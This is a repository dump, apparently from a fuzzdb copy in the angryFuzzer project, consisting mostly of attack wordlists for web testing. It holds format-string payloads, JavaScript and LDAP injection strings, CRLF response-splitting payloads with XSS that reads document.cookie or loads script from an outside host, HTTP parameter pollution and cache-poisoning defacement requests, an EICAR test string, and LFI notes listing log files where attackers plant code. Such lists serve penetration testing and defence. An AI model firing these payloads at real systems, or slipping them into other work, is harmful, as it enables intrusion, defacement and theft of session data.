LPT3.{EXT} 51 | LPT4.{EXT} 52 | LPT5.{EXT} 53 | LPT6.{EXT} 54 | LPT7.{EXT} 55 | LPT8.{EXT} 56 | LPT9.{EXT} 57 | *.{EXT} 58 | ".{EXT} 59 | [.{EXT} 60 | ].{EXT} 61 | :.{EXT} 62 | |.{EXT} 63 | =.{EXT} 64 | ,.{EXT} 65 | -------------------------------------------------------------------------------- /fuzzdb/attack/file-upload/invalid-filesystem-chars-microsoft.txt: -------------------------------------------------------------------------------- 1 | * 2 | . 3 | " 4 | / 5 | \ 6 | [ 7 | ] 8 | : 9 | ; 10 | | 11 | = 12 | , 13 | -------------------------------------------------------------------------------- /fuzzdb/attack/file-upload/invalid-filesystem-chars-osx.txt: -------------------------------------------------------------------------------- 1 | # list of invalid characters for osx - these can be used to attempt to cause an error condition during file upload bypass attempts which might reveal an absolute path. Useful if you're not sure where your files are landing. 2 | # fuzz these into a filename during upload attempts 3 | : 4 | -------------------------------------------------------------------------------- /fuzzdb/attack/file-upload/malicious-images/POC_img_phpinfo-CR.gif: -------------------------------------------------------------------------------- 1 | GIF89a1 2 | -------------------------------------------------------------------------------- /fuzzdb/attack/file-upload/malicious-images/POC_img_phpinfo-LF-CR.gif: -------------------------------------------------------------------------------- 1 | GIF89a1 2 | 3 | -------------------------------------------------------------------------------- /fuzzdb/attack/file-upload/malicious-images/POC_phpinfo-metadata.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/attack/file-upload/malicious-images/POC_phpinfo-metadata.gif -------------------------------------------------------------------------------- /fuzzdb/attack/file-upload/malicious-images/POC_phpinfo-metadata.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/attack/file-upload/malicious-images/POC_phpinfo-metadata.jpg -------------------------------------------------------------------------------- /fuzzdb/attack/file-upload/malicious-images/eicar.com.txt: -------------------------------------------------------------------------------- 1 | X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* -------------------------------------------------------------------------------- /fuzzdb/attack/file-upload/malicious-images/lottapixel.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/attack/file-upload/malicious-images/lottapixel.jpg -------------------------------------------------------------------------------- /fuzzdb/attack/file-upload/malicious-images/uber.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/attack/file-upload/malicious-images/uber.gif -------------------------------------------------------------------------------- /fuzzdb/attack/file-upload/malicious-images/xssproject.swf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/attack/file-upload/malicious-images/xssproject.swf -------------------------------------------------------------------------------- /fuzzdb/attack/format-strings/format-strings.txt: -------------------------------------------------------------------------------- 1 | %s%p%x%d 2 | %p%p%p%p 3 | %x%x%x%x 4 | %d%d%d%d 5 | %s%s%s%s 6 | %99999999999s 7 | %08x 8 | %20d 9 | %20n 10 | %20x 11 | %20s 12 | %d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d 13 | %i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i 14 | %o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o 15 | %u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u 16 | %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x 17 | %X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X 18 | %a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a 19 | %A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A 20 | %e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e 21 | %E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E 22 | %f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f 23 | %F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F 24 | %g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g 25 | %G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G 26 | %s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s 27 | %p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p 28 | %#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%% 29 | XXXXX.%p 30 | XXXXX`perl -e 'print ".%p" x 80'` 31 | `perl -e 'print ".%p" x 80'`%n 32 | %08x.%08x.%08x.%08x.%08x\n 33 | XXX0_%08x.%08x.%08x.%08x.%08x\n 34 | %.16705u%2\$hn 35 | \x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s| 36 | AAAAA%c 37 | AAAAA%d 38 | AAAAA%e 39 | AAAAA%f 40 | AAAAA%I 41 | AAAAA%o 42 | AAAAA%p 43 | AAAAA%s 44 | AAAAA%x 45 | AAAAA%n 46 | ppppp%c 47 | ppppp%d 48 | ppppp%e 49 | ppppp%f 50 | ppppp%I 51 | ppppp%o 52 | ppppp%p 53 | ppppp%s 54 | ppppp%x 55 | ppppp%n 56 | %@ 57 | %@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@ 58 | -------------------------------------------------------------------------------- /fuzzdb/attack/html_js_fuzz/html_attributes.txt: -------------------------------------------------------------------------------- 1 | accept 2 | accept-charset 3 | accesskey 4 | action 5 | align 6 | alt 7 | async 8 | autocomplete 9 | autofocus 10 | autoplay 11 | bgcolor 12 | border 13 | challenge 14 | charset 15 | checked 16 | cite 17 | class 18 | color 19 | cols 20 | colspan 21 | content 22 | contenteditable 23 | contextmenu 24 | controls 25 | coords 26 | data 27 | data-userdefined-attribute 28 | datetime 29 | default 30 | defer 31 | dir 32 | dirname 33 | disabled 34 | download 35 | draggable 36 | dropzone 37 | enctype 38 | for 39 | form 40 | formaction 41 | headers 42 | height 43 | hidden 44 | high 45 | href 46 | hreflang 47 | http-equiv 48 | id 49 | ismap 50 | keytype 51 | kind 52 | label 53 | lang 54 | list 55 | loop 56 | low 57 | manifest 58 | max 59 | maxlength 60 | media 61 | method 62 | min 63 | multiple 64 | muted 65 | name 66 | novalidate 67 | onabort 68 | onafterprint 69 | onbeforeprint 70 | onbeforeunload 71 | onblur 72 | oncanplay 73 | oncanplaythrough 74 | onchange 75 | onclick 76 | oncontextmenu 77 | oncopy 78 | oncuechange 79 | oncut 80 | ondblclick 81 | ondrag 82 | ondragend 83 | ondragenter 84 | ondragleave 85 | ondragover 86 | ondragstart 87 | ondrop 88 | ondurationchange 89 | onemptied 90 | onended 91 | onerror 92 | onfocus 93 | onhashchange 94 | oninput 95 | oninvalid 96 | onkeydown 97 | onkeypress 98 | onkeyup 99 | onload 100 | onloadeddata 101 | onloadedmetadata 102 | onloadstart 103 | onmessage 104 | onmousedown 105 | onmousemove 106 | onmouseout 107 | onmouseover 108 | onmouseup 109 | onmousewheel 110 | onoffline 111 | ononline 112 | onpagehide 113 | onpageshow 114 | onpaste 115 | onpause 116 | onplay 117 | onplaying 118 | onpopstate 119 | onprogress 120 | onratechange 121 | onreset 122 | onresize 123 | onscroll 124 | onsearch 125 | onseeked 126 | onseeking 127 | onselect 128 | onshow 129 | onstalled 130 | onstorage 131 | onsubmit 132 | onsuspend 133 | ontimeupdate 134 | ontoggle 135 | onunload 136 | onvolumechange 137 | onwaiting 138 | onwheel 139 | open 140 | optimum 141 | pattern 142 | placeholder 143 | poster 144 | preload 145 | readonly 146 | rel 147 | required 148 | reversed 149 | rows 150 | rowspan 151 | sandbox 152 | scope 153 | scoped 154 | selected 155 | shape 156 | size 157 | sizes 158 | span 159 | spellcheck 160 | src 161 | srcdoc 162 | srclang 163 | start 164 | step 165 | style 166 | tabindex 167 | target 168 | title 169 | translate 170 | type 171 | usemap 172 | value 173 | width 174 | wrap 175 | -------------------------------------------------------------------------------- /fuzzdb/attack/html_js_fuzz/html_tags.txt: -------------------------------------------------------------------------------- 1 | !-- -- 2 | !DOCTYPE 3 | a 4 | abbr 5 | acronym 6 | address 7 | applet 8 | area 9 | article 10 | aside 11 | audio 12 | b 13 | base 14 | basefont 15 | bdi 16 | bdo 17 | big 18 | blockquote 19 | body 20 | br 21 | button 22 | canvas 23 | caption 24 | center 25 | cite 26 | code 27 | col 28 | colgroup 29 | datalist 30 | dd 31 | del 32 | details 33 | dfn 34 | dialog 35 | dir 36 | div 37 | dl 38 | dt 39 | em 40 | embed 41 | fieldset 42 | figcaption 43 | figure 44 | font 45 | footer 46 | form 47 | frame 48 | frameset 49 | h1 50 | h2 51 | h3 52 | h4 53 | h5 54 | h6 55 | head 56 | header 57 | hr 58 | html 59 | i 60 | iframe 61 | img 62 | input 63 | ins 64 | kbd 65 | keygen 66 | label 67 | legend 68 | li 69 | link 70 | main 71 | map 72 | mark 73 | menu 74 | menuitem 75 | meta 76 | meter 77 | nav 78 | noframes 79 | noscript 80 | object 81 | ol 82 | optgroup 83 | option 84 | output 85 | p 86 | param 87 | pre 88 | progress 89 | q 90 | rp 91 | rt 92 | ruby 93 | s 94 | samp 95 | script 96 | section 97 | select 98 | small 99 | source 100 | span 101 | strike 102 | strong 103 | style 104 | sub 105 | summary 106 | sup 107 | table 108 | tbody 109 | td 110 | textarea 111 | tfoot 112 | th 113 | thead 114 | time 115 | title 116 | tr 117 | track 118 | tt 119 | u 120 | ul 121 | var 122 | video 123 | wbr 124 | -------------------------------------------------------------------------------- /fuzzdb/attack/html_js_fuzz/javascript_events.txt: -------------------------------------------------------------------------------- 1 | onafterprint 2 | onbeforeprint 3 | onbeforeonload 4 | onblur 5 | onerror 6 | onfocus 7 | onhaschange 8 | onload 9 | onmessage 10 | onoffline 11 | ononline 12 | onpagehide 13 | onpageshow 14 | onpopstate 15 | onredo 16 | onresize 17 | onstorage 18 | onundo 19 | onunload 20 | onblur 21 | onchange 22 | oncontextmenu 23 | onfocus 24 | onformchange 25 | onforminput 26 | oninput 27 | oninvalid 28 | onreset 29 | onselect 30 | onsubmit 31 | onkeydown 32 | onkeypress 33 | onkeyup 34 | onclick 35 | ondblclick 36 | ondrag 37 | ondragend 38 | ondragenter 39 | ondragleave 40 | ondragover 41 | ondragstart 42 | ondrop 43 | onmousedown 44 | onmousemove 45 | onmouseout 46 | onmouseover 47 | onmouseup 48 | onmousewheel 49 | onscroll 50 | onabort 51 | oncanplay 52 | oncanplaythrough 53 | ondurationchange 54 | onemptied 55 | onended 56 | onerror 57 | onloadeddata 58 | onloadedmetadata 59 | onloadedstart 60 | onpause 61 | onplay 62 | onplaying 63 | onprogress 64 | onratechange 65 | onreadystatechange 66 | onseeked 67 | onseeking 68 | onstalled 69 | onsuspend 70 | ontimeupdate 71 | onvolumechange 72 | onwaiting 73 | style 74 | 75 | -------------------------------------------------------------------------------- /fuzzdb/attack/html_js_fuzz/js_inject.txt: -------------------------------------------------------------------------------- 1 | function(){ return this.userid} 2 | ' function(){ return this.username} or '1'='1 3 | function(){return version()} 4 | function(){return version} 5 | t'; return this; var d='! 6 | " function(){ return this} or '1'='1 7 | t"; return this; var d='! 8 | ' || this || '1'=='1 9 | ' || this.version || '1'=='1 10 | ' || '1'=='1 11 | -------------------------------------------------------------------------------- /fuzzdb/attack/html_js_fuzz/quotationmarks.txt: -------------------------------------------------------------------------------- 1 | ' 2 | " 3 | '' 4 | "" 5 | '"' 6 | "''''"'" 7 | "'"'"''''" 8 | 9 | 10 | 11 | 12 | -------------------------------------------------------------------------------- /fuzzdb/attack/http-protocol/README.md: -------------------------------------------------------------------------------- 1 | References: 2 | 3 | http://ha.ckers.org/response-splitting.html 4 | 5 | -------------------------------------------------------------------------------- /fuzzdb/attack/http-protocol/crlf-injection.txt: -------------------------------------------------------------------------------- 1 | %0d%0a 2 | %0d%0a%0d%0a 3 | r%0d%0aContentLength:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContentType:%20text/html%0d%0aContentLength:%2019%0d%0a%0d%0aInjected%02Content 4 | %0d%0d%0a%0a 5 | 0x0D0x0A 6 | 0x0D0x0D0x0A0x0A 7 | \r\n 8 | %5cr%5cn 9 | %0%0d%0ad%0%0d%0aa 10 | %0%0D%0AD%0%0D%0AA 11 | %0d%0aContentType:%20text/html;charset=UTF-7%0d%0aContent-Length:%20129%0d%0a%0d%0a%2BADw-html%2BAD4-%2BADw-body%2BAD4-%2BADw-script%2BAD4-alert%28%27XSS,cookies:%27%2Bdocument.cookie%29%2BADw-/script%2BAD4-%2BADw-/body%2BAD4-%2BADw-/html%2BAD4 12 | %0AContent-Type:html%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E 13 | %0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E 14 | %0AContent-Type:html%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3Ehttp://www.test.com 15 | %0d%0a%0d%0a%3Chtml%3E%3Cbody%3E%3C%2Fbody%3E%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fs.js%3E%3C%2Fscript%3E%3Cscript%3Ealert(%22location.host%20is:%20%22%2Blocation.host)%3C%2Fscript%3E%3C%2Fhtml%3E 16 | %0d%0a%0d%0a%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2Fscript%3E 17 | %22%3E%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3C%22 18 | %0AContent-type:%20text/html%0A%0Ahttp://www.test.com/%3Cscript%3Ealert(%22XSS%22)%3C/script%3E 19 | %0d%0a%0d%0a%3Cscript%3Ealert(%22XSS%22)%3C%2Fscript%3E 20 | %0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E 21 | -------------------------------------------------------------------------------- /fuzzdb/attack/http-protocol/docs.http-method-defs.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/attack/http-protocol/docs.http-method-defs.html -------------------------------------------------------------------------------- /fuzzdb/attack/http-protocol/hpp.txt: -------------------------------------------------------------------------------- 1 | # HTTP paramter polution and interpretation payloads by Jacco van Tuijl 2 | ?id=id=1 3 | &id=1?id=2 4 | ?id['&id=1']=2 5 | ?id[1&id=2]=1 6 | ?id=1&id=2 7 | &id=1&id=2 8 | ?id=1%26id%3D2 9 | ?id&id=1 10 | ????id=1 11 | &&&&id=1 12 | ?id=id['1']=2 13 | ?id=1#id=2 14 | ?id==1 15 | ?id===1 16 | ;id=1?id=2 17 | ?id;id=1 18 | &id=1;id=2 19 | #id=1?id=2&id=3 20 | ?id=1,2 21 | ?id1,id2=1 22 | ?id[=1&id=2]=3 23 | ?id[&id=2]=1 24 | ?id=[1,2] 25 | ?id&=1 26 | ?id[]=1&id=2 27 | ?id=/:@&=+$&id=2 28 | ?id[=/:@&=+$&id=2]=1 29 | ?id={id:{id:1},2} 30 | ?id[{id:{id[]:1},2}]=3 31 | ?id=%23?id=1 32 | ?id=1%26id=2 33 | ?id=1%2526id=2 34 | ?id=1%c0%a6id=2 35 | ?id=1\uc0a6id=2 36 | ?id=1&id=2 37 | ?id=1&id=2 38 | ?id=1%u0026;id=2 -------------------------------------------------------------------------------- /fuzzdb/attack/http-protocol/http-header-cache-poison.txt: -------------------------------------------------------------------------------- 1 | # Header Injection / Cache Poison 1.0 (fuzz the entire get req) (12 April 2010) 2 | # creative commons license http://creativecommons.org/licenses/by/3.0/ 3 | # projurl 4 | GET http://{SITE}testsite.com/redir.php?site=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aLast-Modified:%20Mon,%2027%20Oct%202009%2014:50:18%20GMT%0d%0aContent-Length:%2020%0d%0aContent-Type:%20text/html%0d%0a%0d%0adeface! HTTP/1.1GET http://{SITE}/{REDIRECTURL}?site=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aLast-Modified:%20Mon,%2027%20Oct%202009%2014:50:18%20GMT%0d%0aContent-Length:%2020%0d%0aContent-Type:%20text/html%0d%0a%0d%0adeface! HTTP/1.1 5 | %0d%0aX-Injection-Header:%20AttackValue 6 | -------------------------------------------------------------------------------- /fuzzdb/attack/http-protocol/http-protocol-methods.txt: -------------------------------------------------------------------------------- 1 | OPTIONS 2 | GET 3 | HEAD 4 | POST 5 | PUT 6 | DELETE 7 | TRACE 8 | TRACK 9 | CONNECT 10 | PROPFIND 11 | PROPPATCH 12 | MKCOL 13 | COPY 14 | MOVE 15 | LOCK 16 | UNLOCK 17 | VERSION-CONTROL 18 | REPORT 19 | CHECKOUT 20 | CHECKIN 21 | UNCHECKOUT 22 | MKWORKSPACE 23 | UPDATE 24 | LABEL 25 | MERGE 26 | BASELINE-CONTROL 27 | MKACTIVITY 28 | ORDERPATCH 29 | ACL 30 | PATCH 31 | SEARCH 32 | ARBITRARY 33 | BCOPY 34 | BDELETE 35 | BMOVE 36 | BPROPFIND 37 | BPROPPATCH 38 | DEBUG 39 | INDEX 40 | NOTIFY 41 | POLL 42 | RPC_IN_DATA 43 | RPC_OUT_DATA 44 | SUBSCRIBE 45 | UNSUBSCRIBE 46 | X-MS-ENUMATTS 47 | -------------------------------------------------------------------------------- /fuzzdb/attack/http-protocol/http-request-header-field-names.txt: -------------------------------------------------------------------------------- 1 | Accept 2 | Accept-Charset 3 | Accept-Encoding 4 | Accept-Language 5 | Accept-Datetime 6 | Authorization 7 | Cache-Control 8 | Connection 9 | Cookie 10 | Content-Length 11 | Content-MD5 12 | Content-Type 13 | Date 14 | Expect 15 | From 16 | Host 17 | If-Match 18 | If-Modified-Since 19 | If-None-Match 20 | If-Range 21 | If-Unmodified-Since 22 | Max-Forwards 23 | Origin 24 | Pragma 25 | Proxy-Authorization 26 | Range 27 | Referer 28 | TE 29 | User-Agent 30 | Upgrade 31 | Via 32 | Warning 33 | X-Requested-With 34 | DNT 35 | X-Forwarded-For 36 | X-Forwarded-Host 37 | X-Forwarded-Proto 38 | Front-End-Https 39 | X-Http-Method-Override 40 | X-ATT-DeviceId 41 | X-Wap-Profile 42 | Proxy-Connection -------------------------------------------------------------------------------- /fuzzdb/attack/http-protocol/http-response-header-field-names.txt: -------------------------------------------------------------------------------- 1 | Access-Control-Allow-Origin 2 | Accept-Ranges 3 | Age 4 | Allow 5 | Cache-Control 6 | Connection 7 | Content-Encoding 8 | Content-Language 9 | Content-Length 10 | Content-Location 11 | Content-MD5 12 | Content-Disposition 13 | Content-Range 14 | Content-Type 15 | Date 16 | ETag 17 | Expires 18 | Last-Modified 19 | Link 20 | Location 21 | P3P 22 | Pragma 23 | Proxy-Authenticate 24 | Refresh 25 | Retry-After 26 | Server 27 | Set-Cookie 28 | Status 29 | Strict-Transport-Security 30 | Trailer 31 | Transfer-Encoding 32 | Upgrade 33 | Vary 34 | Via 35 | Warning 36 | WWW-Authenticate 37 | X-Frame-Options 38 | Public-Key-Pins 39 | X-XSS-Protection 40 | Content-Security-Policy 41 | X-Content-Security-Policy 42 | X-WebKit-CSP 43 | X-Content-Type-Options 44 | X-Powered-By 45 | X-UA-Compatible -------------------------------------------------------------------------------- /fuzzdb/attack/http-protocol/known-uri-types.txt: -------------------------------------------------------------------------------- 1 | aaa: 2 | aaas: 3 | about: 4 | acap: 5 | adiumxtra: 6 | afp: 7 | aim: 8 | apt: 9 | aw: 10 | beshare: 11 | bitcoin: 12 | bolo: 13 | callto: 14 | cap: 15 | chrome: 16 | cid: 17 | coap: 18 | content: 19 | crid: 20 | cvs: 21 | data: 22 | dav: 23 | dict: 24 | dns: 25 | doi: 26 | ed2k: 27 | facetime: 28 | fax: 29 | feed: 30 | file: 31 | finger: 32 | fish: 33 | ftp: 34 | geo: 35 | gg: 36 | git: 37 | gizmoproject: 38 | go: 39 | gopher: 40 | gtalk: 41 | h323: 42 | http: 43 | https: 44 | iax: 45 | icap: 46 | im: 47 | imap: 48 | info: 49 | ipp: 50 | irc: 51 | irc6: 52 | ircs: 53 | iris.beep: 54 | iris.lws: 55 | iris.xpcs: 56 | iris.xpc: 57 | iris: 58 | itms: 59 | jar: 60 | javascript: 61 | keyparc: 62 | lastfm: 63 | ldap: 64 | ldaps: 65 | lsid: 66 | magnet: 67 | mailto: 68 | maps: 69 | market: 70 | message: 71 | mid: 72 | mms: 73 | modem: 74 | msnim: 75 | msrps: 76 | msrp: 77 | mtqp: 78 | mumble: 79 | mupdate: 80 | mvn: 81 | news: 82 | nfs: 83 | nntp: 84 | notes: 85 | opaquelocktoken: 86 | palm: 87 | paparazzi: 88 | platform: 89 | pop: 90 | pres: 91 | prospero: 92 | proxy: 93 | psyc: 94 | query: 95 | rmi: 96 | rsync: 97 | rtmp: 98 | rtsp: 99 | secondlife: 100 | service: 101 | sftp: 102 | sgn: 103 | shttp: 104 | sieve: 105 | sip: 106 | sips: 107 | skype: 108 | smb: 109 | sms: 110 | snmp: 111 | soap.beeps: 112 | soap.beep: 113 | soldat: 114 | spotify: 115 | ssh: 116 | steam: 117 | svn: 118 | tag: 119 | teamspeak: 120 | tel: 121 | telnet: 122 | tftp: 123 | things: 124 | thismessage: 125 | tip: 126 | tv: 127 | udp: 128 | unreal: 129 | urn: 130 | ut2004: 131 | uuid: 132 | vemmi: 133 | ventrilo: 134 | view-source: 135 | wais: 136 | webcal: 137 | wss: 138 | ws: 139 | wtai: 140 | wyciwyg: 141 | xfire: 142 | xmlrpc.beeps: 143 | xmlrpc.beep : 144 | xmpp: 145 | xri: 146 | ymsgr: 147 | z39.50r: 148 | z39.50s: 149 | -------------------------------------------------------------------------------- /fuzzdb/attack/integer-overflow/integer-overflows.txt: -------------------------------------------------------------------------------- 1 | -1 2 | 0 3 | 0x100 4 | 0x1000 5 | 0x3fffffff 6 | 0x7ffffffe 7 | 0x7fffffff 8 | 0x80000000 9 | 0xfffffffe 10 | 0xffffffff 11 | 0x10000 12 | 0x100000 13 | -------------------------------------------------------------------------------- /fuzzdb/attack/ip/localhost.txt: -------------------------------------------------------------------------------- 1 | 127.0.0.1 2 | 127.0.0.2 3 | 127.1 4 | 127.2 5 | ::1 6 | 0:0:0:0:0:0:0:1 7 | 0:0:0:000:0:0:0:1 8 | 0000:0000:0000:0000:0000:0000:0000:0001 9 | 2130706433 10 | 2130706434 11 | 7F000001 12 | 7F000002 13 | localhost 14 | -------------------------------------------------------------------------------- /fuzzdb/attack/ldap/README.md: -------------------------------------------------------------------------------- 1 | tool: 2 | http://code.google.com/p/ldap-blind-explorer/ 3 | 4 | video: 5 | http://penetration-testing.7safe.com/the-art-of-exploiting-lesser-known-injection-flaws-revealed-at-black-hat/ 6 | 7 | -------------------------------------------------------------------------------- /fuzzdb/attack/ldap/ldap-injection.txt: -------------------------------------------------------------------------------- 1 | ! 2 | %21 3 | %26 4 | %28 5 | %29 6 | %2A%28%7C%28mail%3D%2A%29%29 7 | %2A%28%7C%28objectclass%3D%2A%29%29 8 | %2A%7C 9 | %7C 10 | \21 11 | \26 12 | \28 13 | \29 14 | & 15 | ( 16 | ) 17 | * 18 | *()|%26' 19 | *()|&' 20 | *(|(mail=*)) 21 | *(|(objectclass=*)) 22 | *)(uid=*))(|(uid=* 23 | (*)*) 24 | *)* 25 | */* 26 | *| 27 | / 28 | // 29 | //* 30 | @* 31 | | 32 | admin* 33 | admin*)((|userpassword=*) 34 | admin*)((|userPassword=*) 35 | x' or name()='username' or 'x'='y 36 | -------------------------------------------------------------------------------- /fuzzdb/attack/lfi/README.md: -------------------------------------------------------------------------------- 1 | LFI - Local File Include attacks 2 | 3 | To exploit an LFI bug, you need to be able to write code to a local file and call it from the include. HTTPD log files are a location that is typically writable. 4 | 5 | common-unix-httpd-log-locations.fuzz.txt 6 | * To exploit a lfi bug, you have to get code into a local file. This list contains a list of common unix logfile locations based on common packages formats. 7 | 8 | common-windows-httpd-log-locations.fuzz.txt 9 | * To exploit a lfi bug, you have to get code into a local file. This list contains a list of common windows logfile locations based on common packages formats. 10 | 11 | JHADDIX_LFI.txt 12 | This file contains many common locations you might have write access to. It's not useful to fuzz it as-is, more to extract the applicable parts, create any possible variants, and use a customized list to hunt for including it. 13 | 14 | For more details: 15 | * https://github.com/fuzzdb-project/fuzzdb/blob/master/docs/misc/Web-Shells-rev2.pdf 16 | 17 | other tools: 18 | * fimap https://tha-imax.de/git/root/fimap 19 | * how-to http://kaoticcreations.blogspot.com/2011/08/automated-lfirfi-scanning-exploiting.html 20 | 21 | 22 | -------------------------------------------------------------------------------- /fuzzdb/attack/lfi/common-ms-httpd-log-locations.txt: -------------------------------------------------------------------------------- 1 | \Program Files\Apache Group\Apache\logs\access.log 2 | \Program Files\Apache Group\Apache\logs\error.log 3 | \Program Files\Apache Group\Apache\conf\httpd.conf 4 | \Program Files\Apache Group\Apache2\conf\httpd.conf 5 | \Program Files (x86)\Apache Group\Apache\logs\access.log 6 | \Program Files (x86)\Apache Group\Apache\logs\error.log 7 | -------------------------------------------------------------------------------- /fuzzdb/attack/lfi/common-unix-httpd-log-locations.txt: -------------------------------------------------------------------------------- 1 | /apache/logs/error.log 2 | /apache/logs/access.log 3 | /apache/logs/error.log 4 | /apache/logs/access.log 5 | /apache/logs/error.log 6 | /apache/logs/access.log 7 | /etc/httpd/logs/acces_log 8 | /etc/httpd/logs/acces.log 9 | /etc/httpd/logs/error_log 10 | /etc/httpd/logs/error.log 11 | /var/www/logs/access_log 12 | /var/www/logs/access.log 13 | /usr/local/apache/logs/access_log 14 | /usr/local/apache/logs/access.log 15 | /var/log/apache/access_log 16 | /var/log/apache2/access_log 17 | /var/log/apache/access.log 18 | /var/log/apache2/access.log 19 | /var/log/access_log 20 | /var/log/access.log 21 | /var/www/logs/error_log 22 | /var/www/logs/error.log 23 | /usr/local/apache/logs/error_log 24 | /usr/local/apache/logs/error.log 25 | /var/log/apache/error_log 26 | /var/log/apache2/error_log 27 | /var/log/apache/error.log 28 | /var/log/apache2/error.log 29 | /var/log/error_log 30 | /var/log/error.log 31 | -------------------------------------------------------------------------------- /fuzzdb/attack/no-sql-injection/Readme.md: -------------------------------------------------------------------------------- 1 | NoSQL Hacking Docs 2 | ================== 3 | - https://www.owasp.org/index.php/Testing_for_NoSQL_injection 4 | - https://arxiv.org/pdf/1506.04082.pdf 5 | - https://pentesterlab.com/exercises/web_for_pentester_II/course 6 | - https://ckarande.gitbooks.io/owasp-nodegoat-tutorial/content/tutorial/a1_-_sql_and_nosql_injection.html 7 | - https://www.defcon.org/images/defcon-21/dc-21-presentations/Chow/DEFCON-21-Chow-Abusing-NoSQL-Databases.pdf 8 | - http://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb.html 9 | 10 | NoSQL Hacking Tools 11 | =================== 12 | - http://nosqlmap.net/index.html 13 | 14 | Credits 15 | ======= 16 | Thanks to https://github.com/cr0hn/nosqlinjection_wordlists for starting this wordlist 17 | -------------------------------------------------------------------------------- 